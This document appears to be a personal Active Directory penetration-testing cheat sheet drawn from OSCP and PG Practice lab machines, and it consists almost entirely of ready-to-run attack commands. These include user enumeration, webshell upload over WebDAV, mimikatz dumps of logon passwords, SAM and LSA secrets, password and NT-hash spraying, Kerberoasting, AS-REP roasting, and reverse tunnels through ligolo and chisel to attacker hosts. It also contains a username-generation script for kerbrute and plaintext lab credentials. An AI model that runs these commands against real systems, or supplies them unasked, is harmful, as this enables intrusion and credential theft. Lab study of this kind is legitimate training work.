AD Set

Based on:

  • PG Practice: Access, Hokkaido, Hutch, Nagoya, Resourced, Vault

  • PEN-200: OSCP A, OSCP B, OSCP C

No Creds

Port Scan

The nmap-scan script can be found here.

sudo nmap-scan <target-IP>
Domain Enumeration
# Enumerate objects
ldapsearch -v -x -b "DC=DC01,DC=offsec" -H "ldap://192.168.120.108" "(objectclass=*)"

# Enumerate users' description field
uv run nxc ldap DC01 -u '' -p '' -M get-desc-users
kerbrute userenum -d hokkaido-aerospace.com --dc hokka /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
HTTP(S)
# Dirbust with a directory list
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -ac -c -u http://access/FUZZ -e .aspx,.php

# Dirbust with a file list
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -ic -ac -c -u http://access/FUZZ
# Connect to WebDAV
cadaver http://x7331
Authentication required for hutch on server 'x7331':
Username: x7331
Password:
# Upload a webshell
dav:/> put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx

# Upload a webshell directly
curl -T '/home/kali/shell.aspx' 'http://192.168.64.122/' -u x7331:Pass123!
# Create a userlist based on the site users
username-anarchy -i site_users > anarchy_output

# Create a passlist based on the site content
cewl --write cewl_output http://192.168.202.21/
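The site-derived user list above feeds kerbrute. As an added example (not from these notes and not username-anarchy's own code), the function below expands "First Last" names into the username formats AD environments commonly use and de-duplicates them; the names in SAMPLE_SITE_USERS are constructed for the demo.

```shell
#!/usr/bin/env bash
# Added example, not part of the original notes: expand "First Last" names into the
# username formats commonly seen in AD (first.last, flast, f.last, firstl, ...).
# The names in SAMPLE_SITE_USERS are constructed for the demo.

SAMPLE_SITE_USERS='Celia Almeda
Eric Wallows
x7331'

# Read names on stdin (one per line, "First Last" or a bare handle) and print
# de-duplicated lowercase candidates, one per line, in a stable order.
ad_username_candidates() {
    awk '
        function emit(c) { if (c != "" && !seen[c]++) print c }
        NF >= 2 {
            f = tolower($1); l = tolower($NF)
            fi = substr(f, 1, 1); li = substr(l, 1, 1)
            emit(f "." l); emit(f l); emit(fi l); emit(fi "." l)
            emit(f li); emit(l "." f); emit(l f); emit(f); emit(l)
            next
        }
        NF == 1 { emit(tolower($1)) }
    '
}

# Usage: build the list and hand it to kerbrute (attacker-side, no network needed here):
#   printf "%s\n" "$SAMPLE_SITE_USERS" | ad_username_candidates > site_users_candidates
#   kerbrute userenum -d hokkaido-aerospace.com --dc <dc-ip> site_users_candidates
printf '%s\n' "$SAMPLE_SITE_USERS" | ad_username_candidates
```

Every "First Last" entry yields nine candidates, so keep the input list to real names seen on the site; kerbrute's userenum only produces KRB_ERROR responses for unknown names and does not count against lockout, which is why it is the right place to burn a large candidate list.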
SMB
# List shares and permissions
uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares

# Download the target share
nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999

MS01

Creds

User Context
# User's privileges
whoami /priv

# User's groups
whoami /groups
# History files of all host's users (assuming default path)
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
Host Enumeration
Remote Access ✅

Check for WinRM, RDP, and SSH access:

for service in winrm rdp ssh;do uv run nxc "$service" domain_hosts -u celia.almeda -p 7k8XHk3dMtmpnC7;echo;done | grep +
SMB
# List shares and permissions
uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares

# Download the target share
nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999
Post-Exploitation (Cached Creds) ✅
# Upload binary from the WinRM session
*Evil-WinRM* PS C:\Users\Administrator> upload mimikatz.exe

# Dump active sessions' creds
*Evil-WinRM* PS C:\Users\Administrator> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

# Dump the SAM registry hive
*Evil-WinRM* PS C:\Users\Administrator> .\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

# Dump the LSA secrets
*Evil-WinRM* PS C:\Users\Administrator> .\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"

# Review the loot files (domain_users, domain_passwords, domain_hashes)
$ for file in domain_*;do cat "$file";echo;done

# Spray the collected passwords, then the NT hashes (pass-the-hash); keep only successful logins
$ uv run nxc smb ms01 -u domain_users -p domain_passwords --continue-on-success | grep +

$ uv run nxc smb ms01 -u domain_users -H domain_hashes --continue-on-success | grep +
Pivot (Route to the domain) ✅
# Launch the ligolo server
$ sudo ligolo-proxy -selfcert -laddr 192.168.45.216:443
# Upload ligolo-agent via WinRM
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> upload agent.exe

# Connect to the server
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> .\agent.exe -connect 192.168.45.216:443 -ignore-cert
# Configure the routing
ligolo-ng » INFO[0052] Agent joined.   id=0050569e00f6 name="OSCP\\eric.wallows@MS01" remote="192.168.103.141:49318"
ligolo-ng » session
? Specify a session : 1 - OSCP\eric.wallows@MS01 - 192.168.103.141:49318 - 0050569e00f6
[Agent : OSCP\eric.wallows@MS01] » autoroute
? Select routes to add: 10.10.63.141/24
? Create a new interface or use an existing one? Create a new interface
INFO[0105] Generating a random interface name...
INFO[0105] Using interface name savinglester
INFO[0105] Creating routes for savinglester...
? Start the tunnel? Yes
INFO[0106] Starting tunnel to OSCP\eric.wallows@MS01 (0050569e00f6)
AD Attacks (Domain Data) ✅
# Create a domain user's list
uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --users | awk '$1 == "SMB" && $5 != "[+]" && $5 != "-Username-" && $5 != "[*]" && $5 != "Guest" && $5 != "krbtgt" {print $5}' > domain_users

# Collect domain data
uv run nxc ldap DC01.oscp.exam -u celia.almeda -p 7k8XHk3dMtmpnC7 --bloodhound -c All --dns-server 10.10.63.140
# Spray the collected NT hashes and passwords across every domain host
uv run nxc smb domain_hosts -u domain_users -H domain_hashes --continue-on-success | grep +

uv run nxc smb domain_hosts -u domain_users -p domain_passwords --continue-on-success | grep +

# Kerberoast: request TGS tickets for accounts with an SPN (RC4 tickets crack with hashcat -m 13100)
impacket-GetUserSPNs -request -dc-ip DC01 oscp.exam/celia.almeda:7k8XHk3dMtmpnC7

# AS-REP roast: accounts with Kerberos pre-authentication disabled (hashcat -m 18200)
impacket-GetNPUsers oscp.exam/ -dc-ip DC01 -no-pass -usersfile domain_users

MS02

User Context
# User's privileges
whoami /priv

# User's groups
whoami /groups
# History files of all host's users (assuming default path)
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
Host Enumeration
# Start the chisel server on the attacking host
./chisel server -p 8000 --reverse
# Connect from the target host
.\chisel.exe client 192.168.45.157:8000 R:6033:127.0.0.1:3306
# Enumerate the forwarded port
mysql -h 127.0.0.1 -P 6033 -u root
SMB
# List shares and permissions
uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares

# Download the target share
nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999
MSSQL
AD Attacks
Post-Exploitation (Cached Creds)
# Upload binary from the WinRM session
*Evil-WinRM* PS C:\Users\Administrator> upload mimikatz.exe

# Dump active sessions' creds
*Evil-WinRM* PS C:\Users\Administrator> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

# Dump the SAM registry hive
*Evil-WinRM* PS C:\Users\Administrator> .\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

# Dump the LSA secrets
*Evil-WinRM* PS C:\Users\Administrator> .\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"

# Review the loot files (domain_users, domain_passwords, domain_hashes)
$ for file in domain_*;do cat "$file";echo;done

# Spray the collected passwords, then the NT hashes (pass-the-hash); keep only successful logins
$ uv run nxc smb ms01 -u domain_users -p domain_passwords --continue-on-success | grep +

$ uv run nxc smb ms01 -u domain_users -H domain_hashes --continue-on-success | grep +
